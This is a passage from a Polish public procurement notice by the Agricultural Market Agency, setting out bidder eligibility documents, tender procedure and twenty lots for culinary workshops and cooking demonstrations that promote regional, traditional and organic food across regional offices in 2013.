W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (poz. 231), wykonawca, w miejsce poświadczeń, o których mowa w pkt 2 lit. a), może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w § 1 ust. 1 pkt 2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

DOKUMENTY I OŚWIADCZENIA POTWIERDZAJĄCE BRAK PODSTAW DO WYKLUCZENIA:
1. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielnie zamówienia publicznego Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Zamawiający żąda następujących dokumentów:
a) oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy, wg wzoru stanowiącego Załącznik nr 2 do SIWZ;
a) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentów, o których mowa w ust. 1 lit. b) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że  nie otwarto jego likwidacji ani nie ogłoszono upadłości,
3. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2 niniejszego rozdziału, zastępuje się je dokumentem zawierającym oświadczenie, 
w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. 
4. Dokumenty, o których mowa w ust. 2-3 powinny być wystawione zgodnie z § 4 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (poz. 231).
5. Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium RP, osoby, o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem.
6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane jest:
a) pełnomocnictwo ustanawiające pełnomocnika do reprezentowania ich w  postępowaniu o udzielenie zamówienia albo reprezentowania w  postępowaniu i  zawarcia umowy w sprawie zamówienia,
b) dokumenty określone w ust. 1 niniejszego rozdziału muszą być złożone i podpisane przez każdego Wykonawcę.
7. Wykonawca wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informację o tym, że nie należy do grupy kapitałowej. Jeżeli Wykonawca zostawi ten punkt oferty nie wypełniony (brak skreślenia) Zamawiający uzna, iż Wykonawca nie należy do żadnej grupy kapitałowej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość dokonania zmian istotnych postanowień niniejszej umowy w stosunku do treści oferty, na warunkach wskazanych w treści § 4 pkt 4, tj: zakres przedmiotu zamówienia, o którym mowa w § 2 pkt 1 IPU, może ulec zmianie w wyniku rozszerzenia oferty warsztatów lub pokazów, wydłużenia czasu świadczenia usługi itp. co  nie powoduje zmiany wynagrodzenia, określonego w § 4  pkt 1  IPU.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rynku Rolnego, ul. Nowy Świat 6/12,00-400 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 12:00, miejsce: Agencja Rynku Rolnego, ul. Nowy Świat 6/12,00-400 Warszawa Kancelaria Ogólna, hol główny, parter, wejście D/A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 1: Oddział Terenowy ARR Gorzów Wielkopolski;Przedmiotem zamówienia jest przeprowadzenie jednodniowych warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Warsztaty będą organizowane podczas XXI Lubuskich Prezentacji Wokalnych Dzieci i Młodzieży Specjalnej Troski, które są elementem Międzynarodowego Festiwalu Artystycznego pn. Dzieci Europy - Europakinder.
Warsztaty mają na celu promocję produktów rolno-spożywczych, ze szczególnym uwzględnieniem produktów ekologicznych i kształtowanie dobrych nawyków żywieniowych wśród dzieci i młodzieży niepełnosprawnej, a tym samym wpływają na rehabilitację młodzieży specjalnej troski poprzez sztukę kulinarną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 2: Oddział Terenowy ARR Gorzów Wielkopolski;Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Warsztaty będą organizowane w ramach etapu II cyklu edukacyjnego pod hasłem Warzywa na potrawach pogranicza.
Warsztaty kulinarne zorganizowane przez OT ARR w Gorzowie Wlkp. mają na celu promocję produktów rolno-spożywczych, ze szczególnym uwzględnieniem produktów regionalnych, tradycyjnych i ekologicznych oraz kształtowanie dobrych nawyków żywieniowych wśród dzieci i młodzieży niepełnosprawnej, a tym samym wpływają na rehabilitację młodzieży specjalnej troski poprzez sztukę kulinarną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 3: Oddział Terenowy ARR Gorzów Wielkopolski;Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad prawidłowego żywienia. Warsztaty będą organizowane w ramach cyklu edukacyjnego dla dzieci pod hasłem: Szlakiem owoców i warzyw. 
Zajęcia edukacyjno-kulinarne zorganizowane po raz drugi przez OT ARR w Gorzowie Wlkp. na terenie województwa lubuskiego mają na celu promocję produktów rolno-spożywczych, ze szczególnym uwzględnieniem produktów regionalnych i ekologicznych oraz kształtowania dobrych nawyków żywieniowych wśród najmłodszych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 4: Oddział Terenowy ARR Gorzów Wielkopolski;Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów ekologicznych oraz zasad prawidłowego żywienia. Warsztaty będą organizowane w ramach cyklu edukacyjnego dla dzieci pod hasłem Na wykopki czas
Zajęcia edukacyjno-kulinarne zorganizowane po raz pierwszy przez OT ARR w Gorzowie Wlkp. na terenie województwa lubuskiego mają na celu promocję produktów rolno-spożywczych, ze szczególnym uwzględnieniem produktów ekologicznych oraz kształtowania dobrych nawyków żywieniowych wśród najmłodszych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 5: Oddział Terenowy ARR Opole. Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych. Celem warsztatów jest zapoznanie uczniów szkół gastronomicznych i rolniczych o profilu gastronomicznym ze sposobami oraz recepturami sporządzania potraw regionalnych i tradycyjnych z produktów ekologicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 6: Oddział Terenowy ARR Olsztyn;Przedmiotem zamówienia jest przeprowadzenie wykładów wraz z pokazami kulinarnymi dotyczącymi produktów regionalnych i tradycyjnych. Celem wykładów i pokazów jest przekazanie wiedzy o walorach dziczyzny pozyskiwanej na terenach Warmii i Mazur oraz praktycznym wykorzystaniu tego surowca w gastronomii i gospodarstwie domowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 7: Oddział Terenowy ARR Olsztyn;Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych. Celem warsztatów jest przekazanie wiedzy o walorach mięsa, mleka i ryb pozyskiwanych na terenach Warmii i Mazur oraz nauka praktycznego wykorzystania tych regionalnych surowców w gastronomii przez osoby prowadzące kuchnię agroturystyczną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 8: Oddział Terenowy ARR Olsztyn;Przedmiotem zamówienia jest przeprowadzenie pokazu kulinarnego dotyczącego produktów regionalnych i tradycyjnych w czasie Festiwalu Dziedzictwa Kulinarnego Warmii, Mazur 
i Powiśla w Olsztynie. Celem pokazu kulinarnego wraz z degustacją jest przekazanie wiedzy o walorach pozyskiwanej na terenach Warmii i Mazur dziczyzny oraz propagowanie wykorzystania tego surowca w kuchni tradycyjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 9: Oddział Terenowy ARR Białystok;Przedmiotem zamówienia jest przeprowadzenie pokazu kulinarnego dotyczącego produktów regionalnych, tradycyjnych i ekologicznych. Celem warsztatów jest zachęcenie nauczycieli zawodu ze szkół gastronomicznych i rolniczych o profilu gastronomicznym ze sposobami oraz recepturami sporządzania potraw regionalnych i tradycyjnych, głównie z produktów ekologicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 10: Oddział Terenowy ARR Białystok; Przedmiotem zamówienia jest przeprowadzenie warsztatów edukacyjno-kulinarnych dotyczących zasad prawidłowego żywienia i promowania spożywania warzyw i owoców 
w codzienne diecie. Celem warsztatów jest zapoznanie uczniów szkół podstawowych 
z prostymi i zarazem smacznymi przekąskami z owoców i warzyw oraz z przekąskami warzywno-mięsnymi i warzywno-rybnymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 11: Oddział Terenowy ARR Białystok. Przedmiotem zamówienia jest przeprowadzenie cyklu warsztatów kulinarnych dotyczących kuchni staropolskiej i tatarskiej. Trzy spotkania poświęcone będą kolejno: pasztetom (mięsne, warzywno-mięsne i jarskie) i chlebom (jedno spotkanie), kuchni tatarskiej (jedno spotkanie), piernikom i wypiekom świątecznym (jedno spotkanie). Celem warsztatów jest zapoznanie kobiet ze środowiska wiejskiego ze sposobami oraz recepturami sporządzania potraw regionalnych i tradycyjnych, głównie z produktów ekologicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 12: Oddział Terenowy ARR Kraków;Przedmiotem zamówienia jest przeprowadzenie 9 warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i wytwarzanych w systemach jakości żywności. Celem warsztatów jest nauka praktycznego przygotowania, w oparciu o tradycyjne receptury 
i metody wytwarzania, dań kuchni lokalnej i tradycyjnej na bazie produktów wysokiej jakości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 13: Oddział Terenowy ARR Bydgoszcz; Przedmiotem zamówienia jest przeprowadzenie spotkań edukacyjnych Owocowe nawyki z Panem Zdrówko z praktycznym pokazem przygotowania surówek i deserów owocowo-warzywnych. Celem warsztatów jest zapoznanie uczniów klas I-III szkół podstawowych ze znaczeniem owoców i warzyw w codziennym odżywianiu się oraz propagowanie zasad prawidłowego żywienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 14: Oddział Terenowy ARR Wrocław;Przedmiotem zamówienia jest przeprowadzenie warsztatów i pokazów kulinarnych oraz szkoleń dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz produktów wytwarzanych w systemach jakości żywności.
Zadaniem warsztatów i pokazów jest zwrócenie uwagi uczniów szkół o profilu rolniczym 
i gastronomicznym na metody produkcji produktów żywnościowych oraz wpływu tych metod na jakość produktów oraz wykorzystanie ich w przyrządzaniu potraw. Uzupełnieniem warsztatów będzie przekazanie wiedzy o systemach jakości żywności.
Zadaniem szkoleń jest zapoznanie uczniów szkół rolniczych i gastronomicznych z systemami produkcji wołowiny: QMP i ekologicznym oraz z charakterystycznymi cechami (część teoretyczna) i metodami przetwarzania (część praktyczna) wołowiny sudeckiej - regionalnego produktu ekologicznego i QMP.
Realizacja powyższych zadań ma na celu promocję produktów żywnościowych regionalnych, tradycyjnych oraz produktów produkowanych w oparciu o systemy jakości żywności, w tym wyprodukowane metodami ekologicznymi i w systemie QMP i upowszechnienie wiedzy 
o wpływie metod produkcji na jakość produktów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 15: Oddział Terenowy ARR Poznań; Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych z użyciem produktów regionalnych z Wielkopolski i przygotowanie z nich unikatowych dań. Potrawy będą serwowane podczas Nocy Restauracji w dniu 24 maja 2013 r. w restauracjach 
w Poznaniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 16: Oddział Terenowy ARR Poznań;Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych i pokazu kulinarnego z użyciem produktów regionalnych, tradycyjnych i żywności wysokiej jakości 
i przygotowanie z nich kilku dań tradycyjnych. Celem warsztatów jest podniesienie świadomości wśród uczniów szkół gastronomicznych, a także innych uczestników warsztatów, wybranych spośród odwiedzających gości na temat zasad prawidłowego odżywiania, żywności wysokiej jakości i żywności tradycyjnej, jej walorów smakowych 
i odżywczych oraz zbudowanie popytu na tego typu produkty. Uzupełnieniem warsztatów będzie przekazanie wiedzy o walorach smakowych i zdrowotnych, a także specyficznej obróbce mięsa wieprzowego świni złotnickiej oraz mięsa gęsiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 17: Oddział Terenowy ARR Warszawa;Przedmiotem zamówienia jest przeprowadzenie Szkolnych Warsztatów Kulinarnych dla Najmłodszych, promujących prawidłowe odżywianie wśród dzieci z klas I-III szkół podstawowych woj. mazowieckiego. Warsztaty zorganizowane zostaną pod hasłem: Zdrowe Odżywianie. Przedsięwzięcie będzie polegało na zorganizowaniu cyklu 10 spotkań składających się z dyskusji i warsztatów (po jednym spotkaniu w każdej szkole). W każdych zajęciach weźmie udział ok. 50 dzieci z klas I-III, które zostaną podzielone na grupy po 5 osób. Celem spotkań jest kształtowanie dobrych nawyków żywieniowych wśród najmłodszych (jako przeciwdziałanie wczesnej nadwadze i otyłości wśród dzieci) oraz dostarczenie dzieciom informacji nt. tego, co należy jeść, jak robić zakupy, jak przygotować śniadanie do szkoły i prawidłowo je w szkole przechować..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 18: Oddział Terenowy ARR Kielce; Przedmiotem zamówienia jest przeprowadzenie IV cyklu edukacyjnego dla dzieci klas I-III świętokrzyskich szkół podstawowych pod hasłem:  I dziewczyny i chłopaki, pragną poznać zdrowia smaki , składającego się z 20 zajęć edukacyjno-kulinarnych.
Podczas warsztatów uczniowie podzieleni na grupy, nadzorowane przez kucharza
i przy jego pomocy, będą przygotowywali zdrowe posiłki, poznając przez zabawę zasady prawidłowego żywienia oraz różne sztuczki kulinarne. 
Zadaniem zajęć prowadzonych przez kucharza jest przekonanie dzieci do jedzenia produktów o wysokiej jakości odżywczej oraz pokazanie, iż przygotowywanie zdrowych posiłków nie jest trudne. 
Celem warsztatów jest kształtowanie dobrych nawyków żywieniowych wśród najmłodszych (jako przeciwdziałanie wczesnej nadwadze i otyłości wśród dzieci). Prowadzone przez uznanego szefa kuchni zajęcia, mają promować produkty regionalne, tradycyjne 
i ekologiczne oraz zasady prawidłowego żywienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 19: Oddział Terenowy ARR Kielce; Przedmiotem zamówienia jest przeprowadzenie II cyklu zajęć kulinarnych składających się 
z 10 pokazów kulinarnych połączonych z warsztatami, dla adeptów sztuki kulinarnej, czyli młodzieży klas ponadgimnazjalnych o profilu gastronomicznym lub pokrewnym. Zadaniem zajęć prowadzonych przez uznanego szefa kuchni, jest promowanie produktów regionalnych, tradycyjnych i ekologicznych. Celem warsztatów jest zapoznanie uczniów szkół gastronomicznych i rolniczych o profilu gastronomicznym ze sposobami oraz recepturami sporządzania potraw regionalnych i tradycyjnych z produktów z uwzględnieniem ekologicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 20: Oddział Terenowy ARR Gdynia; Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych oraz wykładów dotyczących produktów regionalnych, tradycyjnych oraz zasad prawidłowego żywienia. Celem warsztatów oraz wykładów jest zapoznanie uczniów szkół gastronomicznych 
i rolniczych o profilu gastronomicznym ze sposobami oraz recepturami sporządzania potraw regionalnych i tradycyjnych województwa pomorskiego oraz propagowanie prawidłowych nawyków żywieniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
